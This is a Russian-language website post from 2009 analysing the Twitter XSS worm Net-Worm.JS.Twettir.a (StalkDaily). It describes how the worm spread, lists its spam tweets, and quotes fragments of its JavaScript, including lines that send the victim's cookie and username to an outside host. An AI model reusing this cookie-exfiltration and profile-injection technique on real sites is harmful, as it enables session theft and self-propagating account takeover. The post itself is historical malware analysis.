Пятница, 2025-07-04, 3:40 PM
Приветствую Вас Гость | RSS
Главная | | Регистрация | Вход
Меню сайта
Категории раздела
Вирусы [14]
Статистика
Форма входа
Поиск
Календарь
«  Май 2009  »
Пн Вт Ср Чт Пт Сб Вс
    123
45678910
11121314151617
18192021222324
25262728293031
Архив записей
Друзья сайта
  • Официальный блог
  • Сообщество uCoz
  • FAQ по системе
  • Инструкции для uCoz
    • Вирусный информер
    Новости
    //ms.3dn.ru/
    Главная » 2009 » Май » 18 » Net-Worm.JS. Twettir.a
    Net-Worm.JS. Twettir.a
    		1:01 PM
    Семейство XSS-червей, распространявшихся в социальной сети Twitter в апреле 2009 года. Для своего размножения использовали XSS-уязвимости и были созданы 17-и летним американцем Michael "Mikeyy" Mooney. 

    Червь использовал уязвимости в программном обеспечении Twitter, позволявшие производить атаки типа «межсайтовый скриптинг» (XSS) и модифицировать страницы учётных записей пользователей. Заражение происходило при посещении модифицированной страницы на сайте Twitter, или при переходе по гиперссылке в поддельном сообщении, присланном от имени участника Twitter. При этом исполнялся вредоносный сценарий JavaScript.

    Основной функционал червей содержится в трех функциях:

    * XHConn – использует стандартную функцию XMLHttpRequest() для ajax-вызовов;

    * Urlencode – использует стандартную функцию encodeURIComponent() для кодировки URI;

    * Wait – содержит вредоносный функционал. 

    Net-Worm.JS.Twettir.a использует XSS-уязвимость в обработке тега img:
    document.write("http://mikeyylolz.uuuq.com/x.php?c=%22%20+%20cookie%20+%20%22&username=%22%20+%20username%20+%20%22");
    document.write("http://stalkdaily.com/log.gif");

    В скрипт x.php передаются параметры cookies и username текущего пользователя.

    После того, как атакуемый пользователь посетил вредоносную ссылку, червь начинает отправлять с его аккаунта в Twitter-е следующие сообщения (так же содержащие вредоносную ссылку):
    Dude, www.StalkDaily.com is awesome. What's the fuss?"
    Join www.StalkDaily.com everyone!"
    Woooo, www.StalkDaily.com :)"
    Virus!? What? www.StalkDaily.com is legit!"
    Wow...www.StalkDaily.com"
    "@twitter www. StalkDaily.com"

    Также из данных сообщений произвольным образом выбирается одно, которое будет отображаться в профиле у зараженного пользователя. 

    Часть кода червя, в которой происходит изменение параметров пользователя посредством POST-запросов:
    var xss = urlencode('http://www.stalkdaily.com"> 


    В последнем POST-запросе с помощью изменения параметра user[url] на страницу пользователя включается ссылка на зловредный скрипт. Таким образом, все пользователи, посетившие зараженную страницу другого пользователя с уже добавленным скриптом, инициируют выполнение червя у себя. Это, в свою очередь, приводит к рассылке нового сообщения от их имени и добавлению зловредного скрипта к их странице.

    Категория: Вирусы | Просмотров: 831 | Добавил: Admin | Рейтинг: 0.0/0 |
    //ms.3dn.ru © 2025